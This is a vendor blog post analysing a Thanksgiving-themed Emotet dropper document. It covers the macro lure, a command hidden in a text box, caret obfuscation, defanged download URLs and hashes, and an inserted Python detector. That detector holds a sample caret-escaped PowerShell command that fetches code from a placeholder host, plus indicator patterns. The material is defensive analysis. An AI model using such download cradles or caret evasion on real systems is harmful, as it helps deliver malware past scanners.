
BitDam Blog

Roy Rashti
3 minutes & 1 second read · November 20, 2018

Thanksgiving malware campaign

Happy thanksgiving… or is it?

In the last few days, BitDam detected several different malicious files that drop malware, many with names related to Thanksgiving.

The files, carrying names such as “Thanksgiving-wishes.doc”, “Thanksgiving-greeting-card.doc” or “Greeting-Card-Thanksgiving-Day.doc”, pose as a nice, innocent Thanksgiving card.

A quick glance shows that when BitDam detected these files, they all had a relatively low detection rate on VirusTotal (around 6%). That number is obviously growing as we speak. Why? As these files became widespread, other engines adjusted their signatures to detect them.

I was curious to see what differs in these files that makes them harder to detect. I randomly picked one (SHA1 09b4a05719b24789c2a0511184ccd8ffc0a08ea0; SHA256 ed642de0c3636ede6a55294dd38d44a91ca69b07f9ce5d11cfbcf5f84b32aa2f), and here are the findings:

Attack analysis

When the file is opened, it shows a screen that tries to lure the user into enabling macros, as shown in Figure 1.

Figure 1

A quick glance into the macro shows an ‘AutoOpen’ function that runs as soon as the file is loaded. The function contains obfuscated code: the attackers use mathematical operations such as Sin, multiplication, division and so on.

Seeing such techniques is not rare when it comes to code obfuscation, and I’m sure that most engines are used to handling them. However, something did catch my eye: it seems that the attackers tried to hide something inside an OLE object.

The code shown in Figure 2 highlights the access to the text inside this object.

Figure 2

Let’s roll back for a second. If we take a closer look at Figure 1, the screen we see when the document is loaded, we can see something odd in the top left corner. I highlighted it in Figure 3.

Figure 3

That small black square is a text box. Enlarging the text box reveals its actual value: an obfuscated CMD line, shown in Figure 4.

Figure 4

At the end of the function, the VBA script launches a command prompt with the data shown above. It’s easy to spot the ‘^’ characters; cmd.exe treats ‘^’ as an escape character, and here it is used to fool static scans.

My personal opinion is that using the text-box object and reading it from code is the differentiator that helped the attackers bypass many solutions at the time.

The obfuscated CMD line is used to start a PowerShell process with the code shown in Figure 5.

Figure 5

I think that the code is self-explanatory: the attackers try to download the payload from the following domains:

  • htt[p]://raidking.com/a0pbDSCu
  • htt[p]://madisonda.com/zofBoIdrX1
  • htt[p]://boxofgiggles.com/JDKBKAac8m
  • htt[p]://carminewarren.com/D7kEg2A3a
  • htt[p]://chefshots.com/21dJDQqroG

The payload (SHA1 38eba0f30f4ae52916ba75f10d30376c675bda6e, SHA256 db5794255ef6c3f576d39fc8b69ec3af020a1a30dcacfbc25c6fa176fe40445e) appears to be Emotet, one of the most prominent malware families of 2018.
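To make the caret trick described above concrete from a detection standpoint, here is an added example (not code from the post, and not BitDam’s detection logic) that normalises a cmd.exe line the way the command interpreter does before matching it against PowerShell-downloader indicators. The sample command line and the URL in it are constructed placeholders, not indicators from this campaign.

```python
import re

# Constructed sample of a caret-escaped cmd.exe line of the kind the post
# describes (placeholder URL, not an indicator from the campaign).
SAMPLE_CMD = ("c^m^d /^c p^o^w^e^r^S^h^e^L^L -^n^o^p -^w hidden -^c "
              "\"(New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"")

# Indicators that only become visible once the carets are removed.
SUSPICIOUS = [
    r"powershell", r"-w\s*hidden", r"-nop", r"net\.webclient",
    r"download(file|string)", r"invoke-webrequest",
]


def strip_carets(line: str) -> str:
    """Return the line as cmd.exe sees it after caret processing.
    Outside double quotes, '^' escapes the next character (so '^"' is a
    literal quote that does not toggle quote mode); inside double quotes
    '^' is literal. A trailing '^' is dropped (line continuation)."""
    out, in_quotes, i = [], False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == '^' and not in_quotes:
            if i + 1 < len(line):
                out.append(line[i + 1])
                i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def score_cmdline(line: str) -> dict:
    """Normalise the line and report which indicators match it."""
    normalised = strip_carets(line)
    hits = [p for p in SUSPICIOUS if re.search(p, normalised, re.IGNORECASE)]
    return {
        "carets": line.count("^"),
        "normalised": normalised,
        "hits": hits,
        "verdict": "suspicious" if len(hits) >= 2 else "clean",
    }


if __name__ == "__main__":
    print(score_cmdline(SAMPLE_CMD))
```

A naive substring match for “powershell” on the raw line finds nothing, which is exactly the static-scan blind spot the post points out; matching after normalisation does.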

Here are some other droppers using similar techniques (Sha1s):

  • 7482ff036f86b35288fdd78bb159e883f911f08f
  • 747c1de46ef95cf12543a0c9e61529fdad9da96b
  • bb277708c03a5f3d4b76f82563a68312a6424981

How come it wasn’t detected?

How come this attack bypassed 94% of the engines listed on VirusTotal? I guess that being reactive rather than proactive makes the big difference. Again. Unlike other solutions, BitDam detects any malicious file, whether it’s known, a variation of a known file or completely unknown. Check it out yourself for free here.